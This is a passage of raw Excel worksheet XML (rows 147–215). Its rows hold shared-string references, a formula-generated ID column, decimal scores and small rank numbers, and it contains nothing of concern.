        <f t="shared" si="2"/>
        <v>9613126</v>
      </c>
      <c r="D147" t="s">
        <v>295</v>
      </c>
      <c r="E147">
        <v>34.084346771240227</v>
      </c>
      <c r="F147">
        <v>1</v>
      </c>
    </row>
    <row r="148" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A148" t="s">
        <v>293</v>
      </c>
      <c r="B148" t="s">
        <v>294</v>
      </c>
      <c r="C148">
        <f t="shared" si="2"/>
        <v>9614379</v>
      </c>
      <c r="D148" t="s">
        <v>296</v>
      </c>
      <c r="E148">
        <v>16.096664428710941</v>
      </c>
      <c r="F148">
        <v>2</v>
      </c>
    </row>
    <row r="149" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A149" t="s">
        <v>297</v>
      </c>
      <c r="B149" t="s">
        <v>298</v>
      </c>
      <c r="C149">
        <f t="shared" si="2"/>
        <v>9615632</v>
      </c>
      <c r="D149" t="s">
        <v>299</v>
      </c>
      <c r="E149">
        <v>24.298984527587891</v>
      </c>
      <c r="F149">
        <v>1</v>
      </c>
    </row>
    <row r="150" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A150" t="s">
        <v>297</v>
      </c>
      <c r="B150" t="s">
        <v>298</v>
      </c>
      <c r="C150">
        <f t="shared" si="2"/>
        <v>9616885</v>
      </c>
      <c r="D150" t="s">
        <v>300</v>
      </c>
      <c r="E150">
        <v>0.34320306777954102</v>
      </c>
      <c r="F150">
        <v>2</v>
      </c>
    </row>
    <row r="151" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A151" t="s">
        <v>301</v>
      </c>
      <c r="B151" t="s">
        <v>302</v>
      </c>
      <c r="C151">
        <f t="shared" si="2"/>
        <v>9618138</v>
      </c>
      <c r="D151" t="s">
        <v>303</v>
      </c>
      <c r="E151">
        <v>31.10752105712891</v>
      </c>
      <c r="F151">
        <v>1</v>
      </c>
    </row>
    <row r="152" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A152" t="s">
        <v>301</v>
      </c>
      <c r="B152" t="s">
        <v>302</v>
      </c>
      <c r="C152">
        <f t="shared" si="2"/>
        <v>9619391</v>
      </c>
      <c r="D152" t="s">
        <v>304</v>
      </c>
      <c r="E152">
        <v>10.646013259887701</v>
      </c>
      <c r="F152">
        <v>2</v>
      </c>
    </row>
    <row r="153" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A153" t="s">
        <v>305</v>
      </c>
      <c r="B153" t="s">
        <v>306</v>
      </c>
      <c r="C153">
        <f t="shared" si="2"/>
        <v>9620644</v>
      </c>
      <c r="D153" t="s">
        <v>307</v>
      </c>
      <c r="E153">
        <v>22.773099899291989</v>
      </c>
      <c r="F153">
        <v>1</v>
      </c>
    </row>
    <row r="154" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A154" t="s">
        <v>305</v>
      </c>
      <c r="B154" t="s">
        <v>306</v>
      </c>
      <c r="C154">
        <f t="shared" si="2"/>
        <v>9621897</v>
      </c>
      <c r="D154" t="s">
        <v>308</v>
      </c>
      <c r="E154">
        <v>15.21026039123535</v>
      </c>
      <c r="F154">
        <v>2</v>
      </c>
    </row>
    <row r="155" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A155" t="s">
        <v>309</v>
      </c>
      <c r="B155" t="s">
        <v>310</v>
      </c>
      <c r="C155">
        <f t="shared" si="2"/>
        <v>9623150</v>
      </c>
      <c r="D155" t="s">
        <v>311</v>
      </c>
      <c r="E155">
        <v>18.32872200012207</v>
      </c>
      <c r="F155">
        <v>1</v>
      </c>
    </row>
    <row r="156" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A156" t="s">
        <v>309</v>
      </c>
      <c r="B156" t="s">
        <v>310</v>
      </c>
      <c r="C156">
        <f t="shared" si="2"/>
        <v>9624403</v>
      </c>
      <c r="D156" t="s">
        <v>312</v>
      </c>
      <c r="E156">
        <v>14.03768157958984</v>
      </c>
      <c r="F156">
        <v>2</v>
      </c>
    </row>
    <row r="157" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A157" t="s">
        <v>313</v>
      </c>
      <c r="B157" t="s">
        <v>314</v>
      </c>
      <c r="C157">
        <f t="shared" si="2"/>
        <v>9625656</v>
      </c>
      <c r="D157" t="s">
        <v>315</v>
      </c>
      <c r="E157">
        <v>32.640754699707031</v>
      </c>
      <c r="F157">
        <v>1</v>
      </c>
    </row>
    <row r="158" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A158" t="s">
        <v>313</v>
      </c>
      <c r="B158" t="s">
        <v>314</v>
      </c>
      <c r="C158">
        <f t="shared" si="2"/>
        <v>9626909</v>
      </c>
      <c r="D158" t="s">
        <v>316</v>
      </c>
      <c r="E158">
        <v>12.85934352874756</v>
      </c>
      <c r="F158">
        <v>2</v>
      </c>
    </row>
    <row r="159" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A159" t="s">
        <v>317</v>
      </c>
      <c r="B159" t="s">
        <v>318</v>
      </c>
      <c r="C159">
        <f t="shared" si="2"/>
        <v>9628162</v>
      </c>
      <c r="D159" t="s">
        <v>319</v>
      </c>
      <c r="E159">
        <v>28.226495742797852</v>
      </c>
      <c r="F159">
        <v>1</v>
      </c>
    </row>
    <row r="160" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A160" t="s">
        <v>317</v>
      </c>
      <c r="B160" t="s">
        <v>318</v>
      </c>
      <c r="C160">
        <f t="shared" si="2"/>
        <v>9629415</v>
      </c>
      <c r="D160" t="s">
        <v>320</v>
      </c>
      <c r="E160">
        <v>8.7887744903564453</v>
      </c>
      <c r="F160">
        <v>2</v>
      </c>
    </row>
    <row r="161" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A161" t="s">
        <v>321</v>
      </c>
      <c r="B161" t="s">
        <v>322</v>
      </c>
      <c r="C161">
        <f t="shared" si="2"/>
        <v>9630668</v>
      </c>
      <c r="D161" t="s">
        <v>315</v>
      </c>
      <c r="E161">
        <v>26.472406387329102</v>
      </c>
      <c r="F161">
        <v>1</v>
      </c>
    </row>
    <row r="162" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A162" t="s">
        <v>321</v>
      </c>
      <c r="B162" t="s">
        <v>322</v>
      </c>
      <c r="C162">
        <f t="shared" si="2"/>
        <v>9631921</v>
      </c>
      <c r="D162" t="s">
        <v>323</v>
      </c>
      <c r="E162">
        <v>1.9928866624832151</v>
      </c>
      <c r="F162">
        <v>2</v>
      </c>
    </row>
    <row r="163" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A163" t="s">
        <v>324</v>
      </c>
      <c r="B163" t="s">
        <v>325</v>
      </c>
      <c r="C163">
        <f t="shared" si="2"/>
        <v>9633174</v>
      </c>
      <c r="D163" t="s">
        <v>326</v>
      </c>
      <c r="E163">
        <v>20.84884071350098</v>
      </c>
      <c r="F163">
        <v>1</v>
      </c>
    </row>
    <row r="164" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A164" t="s">
        <v>324</v>
      </c>
      <c r="B164" t="s">
        <v>325</v>
      </c>
      <c r="C164">
        <f t="shared" si="2"/>
        <v>9634427</v>
      </c>
      <c r="D164" t="s">
        <v>327</v>
      </c>
      <c r="E164">
        <v>3.2139050960540771</v>
      </c>
      <c r="F164">
        <v>2</v>
      </c>
    </row>
    <row r="165" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A165" t="s">
        <v>328</v>
      </c>
      <c r="B165" t="s">
        <v>329</v>
      </c>
      <c r="C165">
        <f t="shared" si="2"/>
        <v>9635680</v>
      </c>
      <c r="D165" t="s">
        <v>330</v>
      </c>
      <c r="E165">
        <v>30.063638687133789</v>
      </c>
      <c r="F165">
        <v>1</v>
      </c>
    </row>
    <row r="166" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A166" t="s">
        <v>328</v>
      </c>
      <c r="B166" t="s">
        <v>329</v>
      </c>
      <c r="C166">
        <f t="shared" si="2"/>
        <v>9636933</v>
      </c>
      <c r="D166" t="s">
        <v>331</v>
      </c>
      <c r="E166">
        <v>16.172121047973629</v>
      </c>
      <c r="F166">
        <v>2</v>
      </c>
    </row>
    <row r="167" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A167" t="s">
        <v>332</v>
      </c>
      <c r="B167" t="s">
        <v>333</v>
      </c>
      <c r="C167">
        <f t="shared" si="2"/>
        <v>9638186</v>
      </c>
      <c r="D167" t="s">
        <v>334</v>
      </c>
      <c r="E167">
        <v>33.069988250732422</v>
      </c>
      <c r="F167">
        <v>1</v>
      </c>
    </row>
    <row r="168" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A168" t="s">
        <v>332</v>
      </c>
      <c r="B168" t="s">
        <v>333</v>
      </c>
      <c r="C168">
        <f t="shared" si="2"/>
        <v>9639439</v>
      </c>
      <c r="D168" t="s">
        <v>335</v>
      </c>
      <c r="E168">
        <v>12.59771251678467</v>
      </c>
      <c r="F168">
        <v>2</v>
      </c>
    </row>
    <row r="169" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A169" t="s">
        <v>336</v>
      </c>
      <c r="B169" t="s">
        <v>337</v>
      </c>
      <c r="C169">
        <f t="shared" si="2"/>
        <v>9640692</v>
      </c>
      <c r="D169" t="s">
        <v>338</v>
      </c>
      <c r="E169">
        <v>23.499576568603519</v>
      </c>
      <c r="F169">
        <v>1</v>
      </c>
    </row>
    <row r="170" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A170" t="s">
        <v>336</v>
      </c>
      <c r="B170" t="s">
        <v>337</v>
      </c>
      <c r="C170">
        <f t="shared" si="2"/>
        <v>9641945</v>
      </c>
      <c r="D170" t="s">
        <v>339</v>
      </c>
      <c r="E170">
        <v>8.7897462844848633</v>
      </c>
      <c r="F170">
        <v>2</v>
      </c>
    </row>
    <row r="171" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A171" t="s">
        <v>340</v>
      </c>
      <c r="B171" t="s">
        <v>341</v>
      </c>
      <c r="C171">
        <f t="shared" si="2"/>
        <v>9643198</v>
      </c>
      <c r="D171" t="s">
        <v>342</v>
      </c>
      <c r="E171">
        <v>31.174020767211911</v>
      </c>
      <c r="F171">
        <v>1</v>
      </c>
    </row>
    <row r="172" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A172" t="s">
        <v>340</v>
      </c>
      <c r="B172" t="s">
        <v>341</v>
      </c>
      <c r="C172">
        <f t="shared" si="2"/>
        <v>9644451</v>
      </c>
      <c r="D172" t="s">
        <v>343</v>
      </c>
      <c r="E172">
        <v>0.1313818842172623</v>
      </c>
      <c r="F172">
        <v>2</v>
      </c>
    </row>
    <row r="173" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A173" t="s">
        <v>344</v>
      </c>
      <c r="B173" t="s">
        <v>345</v>
      </c>
      <c r="C173">
        <f t="shared" si="2"/>
        <v>9645704</v>
      </c>
      <c r="D173" t="s">
        <v>346</v>
      </c>
      <c r="E173">
        <v>32.066864013671882</v>
      </c>
      <c r="F173">
        <v>1</v>
      </c>
    </row>
    <row r="174" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A174" t="s">
        <v>344</v>
      </c>
      <c r="B174" t="s">
        <v>345</v>
      </c>
      <c r="C174">
        <f t="shared" si="2"/>
        <v>9646957</v>
      </c>
      <c r="D174" t="s">
        <v>347</v>
      </c>
      <c r="E174">
        <v>0.86168485879898071</v>
      </c>
      <c r="F174">
        <v>2</v>
      </c>
    </row>
    <row r="175" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A175" t="s">
        <v>348</v>
      </c>
      <c r="B175" t="s">
        <v>349</v>
      </c>
      <c r="C175">
        <f t="shared" si="2"/>
        <v>9648210</v>
      </c>
      <c r="D175" t="s">
        <v>350</v>
      </c>
      <c r="E175">
        <v>30.509281158447269</v>
      </c>
      <c r="F175">
        <v>1</v>
      </c>
    </row>
    <row r="176" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A176" t="s">
        <v>348</v>
      </c>
      <c r="B176" t="s">
        <v>349</v>
      </c>
      <c r="C176">
        <f t="shared" si="2"/>
        <v>9649463</v>
      </c>
      <c r="D176" t="s">
        <v>351</v>
      </c>
      <c r="E176">
        <v>12.245158195495611</v>
      </c>
      <c r="F176">
        <v>2</v>
      </c>
    </row>
    <row r="177" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A177" t="s">
        <v>352</v>
      </c>
      <c r="B177" t="s">
        <v>353</v>
      </c>
      <c r="C177">
        <f t="shared" si="2"/>
        <v>9650716</v>
      </c>
      <c r="D177" t="s">
        <v>354</v>
      </c>
      <c r="E177">
        <v>29.791166305541989</v>
      </c>
      <c r="F177">
        <v>1</v>
      </c>
    </row>
    <row r="178" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A178" t="s">
        <v>352</v>
      </c>
      <c r="B178" t="s">
        <v>353</v>
      </c>
      <c r="C178">
        <f t="shared" si="2"/>
        <v>9651969</v>
      </c>
      <c r="D178" t="s">
        <v>355</v>
      </c>
      <c r="E178">
        <v>13.238462448120121</v>
      </c>
      <c r="F178">
        <v>2</v>
      </c>
    </row>
    <row r="179" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A179" t="s">
        <v>356</v>
      </c>
      <c r="B179" t="s">
        <v>357</v>
      </c>
      <c r="C179">
        <f t="shared" si="2"/>
        <v>9653222</v>
      </c>
      <c r="D179" t="s">
        <v>358</v>
      </c>
      <c r="E179">
        <v>29.693893432617191</v>
      </c>
      <c r="F179">
        <v>1</v>
      </c>
    </row>
    <row r="180" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A180" t="s">
        <v>356</v>
      </c>
      <c r="B180" t="s">
        <v>357</v>
      </c>
      <c r="C180">
        <f t="shared" si="2"/>
        <v>9654475</v>
      </c>
      <c r="D180" t="s">
        <v>359</v>
      </c>
      <c r="E180">
        <v>9.9224233627319336</v>
      </c>
      <c r="F180">
        <v>2</v>
      </c>
    </row>
    <row r="181" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A181" t="s">
        <v>360</v>
      </c>
      <c r="B181" t="s">
        <v>361</v>
      </c>
      <c r="C181">
        <f t="shared" si="2"/>
        <v>9655728</v>
      </c>
      <c r="D181" t="s">
        <v>362</v>
      </c>
      <c r="E181">
        <v>34.596969604492188</v>
      </c>
      <c r="F181">
        <v>1</v>
      </c>
    </row>
    <row r="182" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A182" t="s">
        <v>360</v>
      </c>
      <c r="B182" t="s">
        <v>361</v>
      </c>
      <c r="C182">
        <f t="shared" si="2"/>
        <v>9656981</v>
      </c>
      <c r="D182" t="s">
        <v>363</v>
      </c>
      <c r="E182">
        <v>22.253017425537109</v>
      </c>
      <c r="F182">
        <v>2</v>
      </c>
    </row>
    <row r="183" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A183" t="s">
        <v>360</v>
      </c>
      <c r="B183" t="s">
        <v>361</v>
      </c>
      <c r="C183">
        <f t="shared" si="2"/>
        <v>9658234</v>
      </c>
      <c r="D183" t="s">
        <v>364</v>
      </c>
      <c r="E183">
        <v>0.11215148866176609</v>
      </c>
      <c r="F183">
        <v>3</v>
      </c>
    </row>
    <row r="184" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A184" t="s">
        <v>365</v>
      </c>
      <c r="B184" t="s">
        <v>366</v>
      </c>
      <c r="C184">
        <f t="shared" si="2"/>
        <v>9659487</v>
      </c>
      <c r="D184" t="s">
        <v>367</v>
      </c>
      <c r="E184">
        <v>22.834774017333981</v>
      </c>
      <c r="F184">
        <v>1</v>
      </c>
    </row>
    <row r="185" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A185" t="s">
        <v>365</v>
      </c>
      <c r="B185" t="s">
        <v>366</v>
      </c>
      <c r="C185">
        <f t="shared" si="2"/>
        <v>9660740</v>
      </c>
      <c r="D185" t="s">
        <v>368</v>
      </c>
      <c r="E185">
        <v>8.3907756805419922</v>
      </c>
      <c r="F185">
        <v>2</v>
      </c>
    </row>
    <row r="186" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A186" t="s">
        <v>369</v>
      </c>
      <c r="B186" t="s">
        <v>370</v>
      </c>
      <c r="C186">
        <f t="shared" si="2"/>
        <v>9661993</v>
      </c>
      <c r="D186" t="s">
        <v>371</v>
      </c>
      <c r="E186">
        <v>29.096517562866211</v>
      </c>
      <c r="F186">
        <v>1</v>
      </c>
    </row>
    <row r="187" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A187" t="s">
        <v>369</v>
      </c>
      <c r="B187" t="s">
        <v>370</v>
      </c>
      <c r="C187">
        <f t="shared" si="2"/>
        <v>9663246</v>
      </c>
      <c r="D187" t="s">
        <v>372</v>
      </c>
      <c r="E187">
        <v>6.9369711875915527</v>
      </c>
      <c r="F187">
        <v>2</v>
      </c>
    </row>
    <row r="188" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A188" t="s">
        <v>373</v>
      </c>
      <c r="B188" t="s">
        <v>374</v>
      </c>
      <c r="C188">
        <f t="shared" si="2"/>
        <v>9664499</v>
      </c>
      <c r="D188" t="s">
        <v>375</v>
      </c>
      <c r="E188">
        <v>28.092849731445309</v>
      </c>
      <c r="F188">
        <v>1</v>
      </c>
    </row>
    <row r="189" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A189" t="s">
        <v>373</v>
      </c>
      <c r="B189" t="s">
        <v>374</v>
      </c>
      <c r="C189">
        <f t="shared" si="2"/>
        <v>9665752</v>
      </c>
      <c r="D189" t="s">
        <v>376</v>
      </c>
      <c r="E189">
        <v>9.113551139831543</v>
      </c>
      <c r="F189">
        <v>2</v>
      </c>
    </row>
    <row r="190" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A190" t="s">
        <v>377</v>
      </c>
      <c r="B190" t="s">
        <v>378</v>
      </c>
      <c r="C190">
        <f t="shared" si="2"/>
        <v>9667005</v>
      </c>
      <c r="D190" t="s">
        <v>379</v>
      </c>
      <c r="E190">
        <v>20.694803237915039</v>
      </c>
      <c r="F190">
        <v>1</v>
      </c>
    </row>
    <row r="191" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A191" t="s">
        <v>377</v>
      </c>
      <c r="B191" t="s">
        <v>378</v>
      </c>
      <c r="C191">
        <f t="shared" si="2"/>
        <v>9668258</v>
      </c>
      <c r="D191" t="s">
        <v>380</v>
      </c>
      <c r="E191">
        <v>7.8152914047241211</v>
      </c>
      <c r="F191">
        <v>2</v>
      </c>
    </row>
    <row r="192" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A192" t="s">
        <v>381</v>
      </c>
      <c r="B192" t="s">
        <v>382</v>
      </c>
      <c r="C192">
        <f t="shared" si="2"/>
        <v>9669511</v>
      </c>
      <c r="D192" t="s">
        <v>383</v>
      </c>
      <c r="E192">
        <v>35.381732940673828</v>
      </c>
      <c r="F192">
        <v>1</v>
      </c>
    </row>
    <row r="193" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A193" t="s">
        <v>381</v>
      </c>
      <c r="B193" t="s">
        <v>382</v>
      </c>
      <c r="C193">
        <f t="shared" si="2"/>
        <v>9670764</v>
      </c>
      <c r="D193" t="s">
        <v>384</v>
      </c>
      <c r="E193">
        <v>2.1889641284942631</v>
      </c>
      <c r="F193">
        <v>2</v>
      </c>
    </row>
    <row r="194" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A194" t="s">
        <v>385</v>
      </c>
      <c r="B194" t="s">
        <v>386</v>
      </c>
      <c r="C194">
        <f t="shared" si="2"/>
        <v>9672017</v>
      </c>
      <c r="D194" t="s">
        <v>387</v>
      </c>
      <c r="E194">
        <v>30.858858108520511</v>
      </c>
      <c r="F194">
        <v>1</v>
      </c>
    </row>
    <row r="195" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A195" t="s">
        <v>385</v>
      </c>
      <c r="B195" t="s">
        <v>386</v>
      </c>
      <c r="C195">
        <f t="shared" si="2"/>
        <v>9673270</v>
      </c>
      <c r="D195" t="s">
        <v>388</v>
      </c>
      <c r="E195">
        <v>0.22884392738342291</v>
      </c>
      <c r="F195">
        <v>2</v>
      </c>
    </row>
    <row r="196" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A196" t="s">
        <v>389</v>
      </c>
      <c r="B196" t="s">
        <v>390</v>
      </c>
      <c r="C196">
        <f t="shared" si="2"/>
        <v>9674523</v>
      </c>
      <c r="D196" t="s">
        <v>391</v>
      </c>
      <c r="E196">
        <v>30.376386642456051</v>
      </c>
      <c r="F196">
        <v>1</v>
      </c>
    </row>
    <row r="197" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A197" t="s">
        <v>389</v>
      </c>
      <c r="B197" t="s">
        <v>390</v>
      </c>
      <c r="C197">
        <f t="shared" si="2"/>
        <v>9675776</v>
      </c>
      <c r="D197" t="s">
        <v>392</v>
      </c>
      <c r="E197">
        <v>4.4757237434387207</v>
      </c>
      <c r="F197">
        <v>2</v>
      </c>
    </row>
    <row r="198" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A198" t="s">
        <v>393</v>
      </c>
      <c r="B198" t="s">
        <v>394</v>
      </c>
      <c r="C198">
        <f t="shared" si="2"/>
        <v>9677029</v>
      </c>
      <c r="D198" t="s">
        <v>395</v>
      </c>
      <c r="E198">
        <v>27.454591751098629</v>
      </c>
      <c r="F198">
        <v>1</v>
      </c>
    </row>
    <row r="199" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A199" t="s">
        <v>393</v>
      </c>
      <c r="B199" t="s">
        <v>394</v>
      </c>
      <c r="C199">
        <f t="shared" si="2"/>
        <v>9678282</v>
      </c>
      <c r="D199" t="s">
        <v>396</v>
      </c>
      <c r="E199">
        <v>3.0412483215332031</v>
      </c>
      <c r="F199">
        <v>2</v>
      </c>
    </row>
    <row r="200" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A200" t="s">
        <v>397</v>
      </c>
      <c r="B200" t="s">
        <v>398</v>
      </c>
      <c r="C200">
        <f t="shared" si="2"/>
        <v>9679535</v>
      </c>
      <c r="D200" t="s">
        <v>399</v>
      </c>
      <c r="E200">
        <v>37.719886779785163</v>
      </c>
      <c r="F200">
        <v>1</v>
      </c>
    </row>
    <row r="201" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A201" t="s">
        <v>397</v>
      </c>
      <c r="B201" t="s">
        <v>398</v>
      </c>
      <c r="C201">
        <f t="shared" si="2"/>
        <v>9680788</v>
      </c>
      <c r="D201" t="s">
        <v>400</v>
      </c>
      <c r="E201">
        <v>4.0454859733581543</v>
      </c>
      <c r="F201">
        <v>2</v>
      </c>
    </row>
    <row r="202" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A202" t="s">
        <v>401</v>
      </c>
      <c r="B202" t="s">
        <v>402</v>
      </c>
      <c r="C202">
        <f t="shared" ref="C202:C265" si="3">C201+1253</f>
        <v>9682041</v>
      </c>
      <c r="D202" t="s">
        <v>403</v>
      </c>
      <c r="E202">
        <v>30.12693977355957</v>
      </c>
      <c r="F202">
        <v>1</v>
      </c>
    </row>
    <row r="203" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A203" t="s">
        <v>401</v>
      </c>
      <c r="B203" t="s">
        <v>402</v>
      </c>
      <c r="C203">
        <f t="shared" si="3"/>
        <v>9683294</v>
      </c>
      <c r="D203" t="s">
        <v>404</v>
      </c>
      <c r="E203">
        <v>16.829462051391602</v>
      </c>
      <c r="F203">
        <v>2</v>
      </c>
    </row>
    <row r="204" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A204" t="s">
        <v>405</v>
      </c>
      <c r="B204" t="s">
        <v>406</v>
      </c>
      <c r="C204">
        <f t="shared" si="3"/>
        <v>9684547</v>
      </c>
      <c r="D204" t="s">
        <v>407</v>
      </c>
      <c r="E204">
        <v>25.39204025268555</v>
      </c>
      <c r="F204">
        <v>1</v>
      </c>
    </row>
    <row r="205" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A205" t="s">
        <v>405</v>
      </c>
      <c r="B205" t="s">
        <v>406</v>
      </c>
      <c r="C205">
        <f t="shared" si="3"/>
        <v>9685800</v>
      </c>
      <c r="D205" t="s">
        <v>408</v>
      </c>
      <c r="E205">
        <v>15.73861885070801</v>
      </c>
      <c r="F205">
        <v>2</v>
      </c>
    </row>
    <row r="206" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A206" t="s">
        <v>409</v>
      </c>
      <c r="B206" t="s">
        <v>410</v>
      </c>
      <c r="C206">
        <f t="shared" si="3"/>
        <v>9687053</v>
      </c>
      <c r="D206" t="s">
        <v>411</v>
      </c>
      <c r="E206">
        <v>33.011852264404297</v>
      </c>
      <c r="F206">
        <v>1</v>
      </c>
    </row>
    <row r="207" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A207" t="s">
        <v>409</v>
      </c>
      <c r="B207" t="s">
        <v>410</v>
      </c>
      <c r="C207">
        <f t="shared" si="3"/>
        <v>9688306</v>
      </c>
      <c r="D207" t="s">
        <v>412</v>
      </c>
      <c r="E207">
        <v>9.8889713287353516</v>
      </c>
      <c r="F207">
        <v>2</v>
      </c>
    </row>
    <row r="208" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A208" t="s">
        <v>413</v>
      </c>
      <c r="B208" t="s">
        <v>414</v>
      </c>
      <c r="C208">
        <f t="shared" si="3"/>
        <v>9689559</v>
      </c>
      <c r="D208" t="s">
        <v>415</v>
      </c>
      <c r="E208">
        <v>23.70573806762695</v>
      </c>
      <c r="F208">
        <v>1</v>
      </c>
    </row>
    <row r="209" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A209" t="s">
        <v>413</v>
      </c>
      <c r="B209" t="s">
        <v>414</v>
      </c>
      <c r="C209">
        <f t="shared" si="3"/>
        <v>9690812</v>
      </c>
      <c r="D209" t="s">
        <v>416</v>
      </c>
      <c r="E209">
        <v>10.688533782958981</v>
      </c>
      <c r="F209">
        <v>2</v>
      </c>
    </row>
    <row r="210" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A210" t="s">
        <v>417</v>
      </c>
      <c r="B210" t="s">
        <v>418</v>
      </c>
      <c r="C210">
        <f t="shared" si="3"/>
        <v>9692065</v>
      </c>
      <c r="D210" t="s">
        <v>419</v>
      </c>
      <c r="E210">
        <v>21.967926025390621</v>
      </c>
      <c r="F210">
        <v>1</v>
      </c>
    </row>
    <row r="211" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A211" t="s">
        <v>417</v>
      </c>
      <c r="B211" t="s">
        <v>418</v>
      </c>
      <c r="C211">
        <f t="shared" si="3"/>
        <v>9693318</v>
      </c>
      <c r="D211" t="s">
        <v>420</v>
      </c>
      <c r="E211">
        <v>0.3339499831199646</v>
      </c>
      <c r="F211">
        <v>2</v>
      </c>
    </row>
    <row r="212" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A212" t="s">
        <v>421</v>
      </c>
      <c r="B212" t="s">
        <v>422</v>
      </c>
      <c r="C212">
        <f t="shared" si="3"/>
        <v>9694571</v>
      </c>
      <c r="D212" t="s">
        <v>423</v>
      </c>
      <c r="E212">
        <v>24.619283676147461</v>
      </c>
      <c r="F212">
        <v>1</v>
      </c>
    </row>
    <row r="213" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A213" t="s">
        <v>421</v>
      </c>
      <c r="B213" t="s">
        <v>422</v>
      </c>
      <c r="C213">
        <f t="shared" si="3"/>
        <v>9695824</v>
      </c>
      <c r="D213" t="s">
        <v>424</v>
      </c>
      <c r="E213">
        <v>0.70219254493713379</v>
      </c>
      <c r="F213">
        <v>2</v>
      </c>
    </row>
    <row r="214" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A214" t="s">
        <v>425</v>
      </c>
      <c r="B214" t="s">
        <v>426</v>
      </c>
      <c r="C214">
        <f t="shared" si="3"/>
        <v>9697077</v>
      </c>
      <c r="D214" t="s">
        <v>427</v>
      </c>
      <c r="E214">
        <v>29.980911254882809</v>
      </c>
      <c r="F214">
        <v>1</v>
      </c>
    </row>
    <row r="215" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A215" t="s">
        <v>425</v>
      </c>
      <c r="B215" t="s">
        <v>428</v>
      </c>
      <c r="C215">
